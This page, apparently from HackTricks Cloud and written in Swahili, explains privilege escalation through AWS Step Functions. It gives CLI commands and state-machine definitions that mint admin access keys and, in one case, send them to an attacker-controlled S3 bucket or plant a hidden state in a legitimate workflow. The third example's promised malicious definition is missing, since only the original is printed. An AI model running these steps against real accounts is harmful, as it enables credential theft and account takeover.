HackTricks CloudAWS - Step Functions Privesc
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Step Functions
Kwa maelezo zaidi kuhusu huduma hii ya AWS, angalia:
Task Resources
Mbinu hizi za privilege escalation zitahitaji kutumia baadhi ya rasilimali za AWS Step Functions ili kutekeleza vitendo vinavyohusiana na privilege escalation.
Ili kuangalia vitendo vyote vinavyowezekana, unaweza kwenda kwenye akaunti yako ya AWS, uchague kitendo unachotaka kutumia na uone vigezo vinavyotumika, kama ifuatavyo:
Au unaweza pia kwenda kwenye nyaraka za API za AWS na kukagua nyaraka za kila kitendo:
states:TestState & iam:PassRole
Mshambuliaji mwenye ruhusa za states:TestState na iam:PassRole anaweza kujaribu state yoyote na kupitisha role yoyote ya IAM kwa state hiyo bila kuunda au kusasisha state machine iliyopo, jambo ambalo linaweza kumuwezesha kupata kwa njia isiyoidhinishwa huduma nyingine za AWS kwa kutumia ruhusa za role hizo. Kwa pamoja, ruhusa hizi zinaweza kusababisha vitendo vingi visivyoidhinishwa, kuanzia kubadilisha workflows au data, kuvujisha data, uharibifu wa rasilimali, hadi privilege escalation.
aws states test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
Mifano ifuatayo inaonyesha jinsi ya kujaribu state inayounda access key kwa mtumiaji admin kwa kutumia ruhusa hizi na role yenye upole katika mazingira ya AWS. Role hii yenye upole inapaswa kuwa na sera yoyote yenye ruhusa za juu iliyohusishwa nayo (kwa mfano arn:aws:iam::aws:policy/AdministratorAccess) inayomruhusu state kutekeleza kitendo iam:CreateAccessKey:
- stateDefinition.json:
{
"Type": "Task",
"Parameters": {
"UserName": "admin"
},
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"End": true
}
- Amri iliyotekelezwa kufanya privesc:
aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole
{
"output": "{
\"AccessKey\":{
\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
\"CreateDate\":\"2024-07-09T16:59:11Z\",
\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
\"Status\":\"Active\",
\"UserName\":\"admin\"
}
}",
"status": "SUCCEEDED"
}
Potential Impact: Utekelezaji usioidhinishwa na kuchezea workflows na ufikiaji wa rasilimali nyeti, jambo ambalo linaweza kusababisha kuvunjwa kwa usalama kwa kiwango kikubwa.
states:CreateStateMachine & iam:PassRole & (states:StartExecution | states:StartSyncExecution)
Mshambuliaji mwenye states:CreateStateMachine& iam:PassRole angeweza kuunda state machine na kuipatia yoyote IAM role, akiruhusu ufikiaji usioidhinishwa kwa huduma nyingine za AWS kwa kutumia permissions za role hizo. Ikilinganishwa na mbinu ya privesc iliyotangulia (states:TestState & iam:PassRole), hii haitekelezwi yenyewe; utahitaji pia kuwa na states:StartExecution au states:StartSyncExecution permissions (states:StartSyncExecution haipatikani kwa standard workflows, inapatikana tu kwa express state machines) ili kuanzisha execution kwenye state machine.
# Create a state machine
aws states create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
# Start a state machine execution
aws states start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
# Start a Synchronous Express state machine execution
aws states start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
Mifano ifuatayo yanaonyesha jinsi ya kuunda state machine inayounda access key kwa mtumiaji admin na kuhamisha kitufe hiki cha ufikiaji kwa S3 bucket inayodhibitiwa na mshambuliaji, kwa kutumia ruhusa hizi na role yenye ruhusa nyingi katika mazingira ya AWS. Role hii inapaswa kuwa na sera yoyote ya zenye mamlaka ya juu iliyohusishwa nayo (kwa mfano arn:aws:iam::aws:policy/AdministratorAccess) ambayo inaruhusu state machine kutekeleza vitendo iam:CreateAccessKey na s3:putObject.
- stateMachineDefinition.json:
{
"Comment": "Malicious state machine to create IAM access key and upload to S3",
"StartAt": "CreateAccessKey",
"States": {
"CreateAccessKey": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"Parameters": {
"UserName": "admin"
},
"ResultPath": "$.AccessKeyResult",
"Next": "PrepareS3PutObject"
},
"PrepareS3PutObject": {
"Type": "Pass",
"Parameters": {
"Body.$": "$.AccessKeyResult.AccessKey",
"Bucket": "attacker-controlled-S3-bucket",
"Key": "AccessKey.json"
},
"ResultPath": "$.S3PutObjectParams",
"Next": "PutObject"
},
"PutObject": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:s3:putObject",
"Parameters": {
"Body.$": "$.S3PutObjectParams.Body",
"Bucket.$": "$.S3PutObjectParams.Bucket",
"Key.$": "$.S3PutObjectParams.Key"
},
"End": true
}
}
}
- Amri iliyotekelezwa ili kuunda state machine:
aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
{
"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
"creationDate": "2024-07-09T20:29:35.381000+02:00"
}
- Amri iliyotekelezwa kuanza utekelezaji wa state machine iliyotengenezwa awali:
aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
{
"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
"startDate": "2024-07-09T20:33:35.466000+02:00"
}
warning
S3 bucket inayodhibitiwa na mshambuliaji inapaswa kuwa na ruhusa za kukubali kitendo cha s3:PutObject kutoka kwa akaunti ya mwathirika.
Athari Inayowezekana: Utekelezaji usioidhinishwa na urekebishaji wa workflows na upatikanaji wa rasilimali nyeti, ambayo yanaweza kusababisha uvunjaji mkubwa wa usalama.
states:UpdateStateMachine & (si kila wakati inahitajika) iam:PassRole
Mshambuliaji mwenye ruhusa ya states:UpdateStateMachine anaweza kubadilisha ufafanuzi wa state machine, akiwemo kuongeza states za kimya za ziada ambazo zinaweza kusababisha ongezeko la ruhusa. Kwa njia hiyo, wakati mtumiaji halali ataanzisha utekelezaji wa state machine, state mpya hasidi ya kimya itatekelezwa na ongezeko la ruhusa litafanikiwa.
Kulingana na kiwango cha ruhusa cha IAM Role iliyohusishwa na state machine, mshambuliaji atakutana na matukio mawili:
- Permissive IAM Role: Ikiwa IAM Role iliyohusishwa na state machine tayari ina ruhusa nyingi (kwa mfano ikiwa imeambatana na sera ya
arn:aws:iam::aws:policy/AdministratorAccess), basi ruhusa yaiam:PassRolehaitahitajika kwa kuongeza ruhusa kwa sababu haitakuwa muhimu kusasisha pia IAM Role; ufafanuzi wa state machine utakutosha. - Not permissive IAM Role: Tofauti na kesi ya awali, hapa mshambuliaji atahitaji pia ruhusa ya
iam:PassRolekwa sababu itahitajika kuhusisha IAM Role yenye ruhusa zaidi na state machine pamoja na kubadilisha ufafanuzi wa state machine.
aws states update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
Mifano ifuatayo inaonyesha jinsi ya kusasisha state machine halali ambayo inaita tu HelloWorld Lambda function, ili kuongeza state ya ziada inayemwongeza mtumiaji unprivilegedUser kwenye IAM Group ya administrator. Kwa njia hii, wakati mtumiaji halali atapoanza utekelezaji wa state machine iliyosasishwa, state mpya hii ya kibaya iliyojificha itatekelezwa na kupandisha hadhi kutafanikiwa.
warning
Ikiwa state machine haina IAM Role inayoruhusu iliyohusishwa, pia itahitajika ruhusa ya iam:PassRole ili kusasisha IAM Role ili kuhusisha IAM Role inayoruhusu (kwa mfano ile yenye sera arn:aws:iam::aws:policy/AdministratorAccess imeambatishwa).
{
"Comment": "Hello world from Lambda state machine",
"StartAt": "Start PassState",
"States": {
"Start PassState": {
"Type": "Pass",
"Next": "LambdaInvoke"
},
"LambdaInvoke": {
"Type": "Task",
"Resource": "arn:aws:states:::lambda:invoke",
"Parameters": {
"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
},
"Next": "End PassState"
},
"End PassState": {
"Type": "Pass",
"End": true
}
}
}
- Amri iliyotekelezwa ili kusasisha mashine ya hali halali:
aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
{
"updateDate": "2024-07-10T20:07:10.294000+02:00",
"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
}
Athari Inazoweza Kutokea: Utekelezaji usioidhinishwa na uendeshaji/kuvuruga taratibu za kazi na upatikanaji wa rasilimali nyeti, jambo ambalo linaweza kusababisha uvunjaji mkubwa wa usalama.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.